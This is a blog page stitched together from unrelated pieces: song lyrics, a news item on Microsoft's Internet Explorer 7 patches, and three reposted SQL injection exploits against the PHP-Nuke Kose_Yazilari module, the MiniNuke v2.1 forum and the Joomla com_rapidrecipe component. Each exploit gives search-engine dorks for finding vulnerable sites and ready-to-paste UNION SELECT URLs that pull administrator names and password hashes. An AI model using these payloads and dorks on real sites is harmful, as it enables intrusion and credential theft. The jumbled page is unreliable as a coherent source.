Software And Internet Blog

# PHP-Nuke (Kose_Yazilari) SQL Injection Vulnerability
# AUTHOR : xcorpitx
# HOME : www.Hayalet-hack.com / www.zone-turk.net

# WHEN YOU PUT THIS SQL CODE YOU can SEE ADMýN NAME,ADMIN HASH

# DorK 1 : ‘’name Kose_Yazilari op viewarticle artid'’
# Dork 2 : ‘’name Kose_Yazilari op printpage artid'’

# EXPLOIT:
modules.php?name=Kose_Yazilari&op=viewarticle&artid=-11223344%2F%2A%2A%2F
union%2F%2A%2A%2Fselect%2F%2A%2A%2F0,1,aid,pwd,4,5%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors

modules.php?name=Kose_Yazilari&op=printpage&artid=-99999999%2F%2A%2A%2F
UNION%2F%2A%2A%2FSELECT%2F%2A%2A%2F0,pwd,aid,3%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors

#Thank my friends : pc faresi, hayalet,D3ng3s!z,SmoKin,apex,mostbiq

# MiniNuke v2.1 forum SQL Injection

# AUTHOR : S@BUN

# HOME : http://www.milw0rm.com/author/1334

# MAİL : hackturkiye.hackturkiye@gmail.com

# DORK 1 : allinurl:”members.asp?action”
# DORK 2 : allinurl: “members.asp”uid

#EXAMPLE=

members.asp?action=member_details&uid=SQL (exploit)

#EXPLOIT 1 :

members.asp?action=member_details&uid=-1%20union%20select%200,sifre,0,0,0,0,0,
kul_adi,0,sifre,kul_adi,sifre,1,1,1,sifre,1,1,1,isim,1,1,1,1,1,1,1,1%20from%20members

#EXPLOIT 2 :

members.asp?action=member_details&uid=-1%20union%20select%200,0,0,0,0,0,0,
sifre,0,sifre,0,1,1,sifre,14,sifre,1,1,1,1,2,1,2,2,2,2,2,2,2,2%20from%20members

EXPLLOIT 3 :

members.asp?action=member_details&uid=-1%20union%20select%200,1,sifre,0,0,0,0,0,0,0,
1,1,1,1,1,1,1,1,1,1,2,2,kul_adi,sifre,2,kul_adi,sifre,2,2,2,sifre,3,3,3,isim,3,3,3,3,3,4,4,4%20from%20members

# S@BUN i AM NOT HACKER S@BUN

You look so beautiful today
When you’re sitting there it’s hard for me to look away
So I try to find the words that I could say
I know distance doesn’t matter but you feel so far away
And I can’t lie, every time I leave my heart turns gray
And I wanna come back home to see your face
And I…Cuz I just can’t take it

Another day without you with me
Is like a blade that cuts right through me
And I can wait…I can wait forever
When you call my heart stops beating
When you’re gone, it won’t stop bleeding
I can wait…I can wait forever

You look so beautiful today
It’s like every time I turn around, I see your face
The thing I miss the most is, waking up next to you
When I look into your eyes, man I wish that I could stay
And I can’t lie, every time I leave my heart turns gray
And I wanna come back home to see your face
And I…Cuz I just can’t take it
(more…)

I fall asleep by the telephone.
It’s two o’clock and I’m waiting up alone.
Tell me, where have you been? (where have you been)
I found a note with another name.
You blow a kiss but it just don’t feel the same.
Cauz I can feel that you’re gone. (feel that you’re gone)
I can’t bite my tongue forever, while you try to play it cool.
You can hide behind your stories, but don’t take me for a fool!

You can tell me that there’s nobody else (but I feel it!)
You can tell me that you’re home by yourself (but I see it!)
You can look into my eyes and pretend all you want, but I know, I know
Your love is just a lie! (Lie! Lie!)
It’s nothing but a lie! (Lie! Lie!)
(more…)

Staring out at the world across the street.
You hate the way your life turned out to be.
He’s pulling up the driveway and you don’t make a sound.
Cause you always learned to hold the things you want to say.
You’re always gonna be afraid.
There’s only hate.
There’s only tears.
There’s only pain.
There is no love here.
So what will you do?
There’s only lies.
There’s only fear.
There’s only pain.
There is no love here.

Broken down like a mirror smashed to pieces.
You learned the hard way to shut your mouth and smile.
If these walls could talk, they would have so much to say.
Cause everytime you fight, the scars are gonna heal.
But they’re never gonna go away.
You’re falling.
You’re screaming.
You’re stuck in the same old nightmare.
He’s lying.
You’re crying.
There’s nothing left to salvage.
Kick the door cause this is over.
Get me out of here!

joomla SQL Injection(com_rapidrecipe)
============================
# AUTHOR : S@BUN
#
# HOME : http://www.hackturkiye.com
#
# MAİL : hackturkiye.hackturkiye@gmail.com
==================================

# DORK 1 : allinurl: “com_rapidrecipe”user_id
# DORK 2 : allinurl: “com_rapidrecipe” category_id
====================================

EXPLOIT :
========

after user_id or catogry_id add exploit

-9999999/**/union/**/select/**/
concat(username,0x3a,password)/**/from/**/jos_users/*
==================================================

rapidrecipe
30/7/2007
Konstantinos Kokkorogiannis
This component in released under the Chefs and Koyans License. You should not use it unless you have bought it.
koyan@dianthos.net

www.dianthos.net
1.6.5

# milw0rm.com [2008-02-12]

Microsoft released 11 patches on Tuesday to fix vulnerabilities in its software, including three critical flaws in the company’s flagship Web browser, Internet Explorer 7.

The three critical security holes in Internet Explorer include memory corruption issues in the browser’s HTML rendering capabilities for certain layouts, the handling of a property method, and the browser’s processing of arguments when processing images. Microsoft rated all three flaws Critical, it’s highest severity rating, for Internet Explorer 7 running on both Windows XP Service Pack 2 systems and Windows Vista systems. A fourth flaw fixed by the patch is rated Important on the most common versions of Windows.

“Today’s Microsoft patches underline the need to be aware when opening files and the risk of surfing the Web unprotected,” Craig Schmugar, a threat researcher at McAfee Avert Labs, said in a statement discussing the patches. “Many of the vulnerabilities addressed by the fixes could be exploited if a Windows user simply opens a file or visits a malicious or compromised Web site, favorite attack methods among cybercriminals.”
(more…)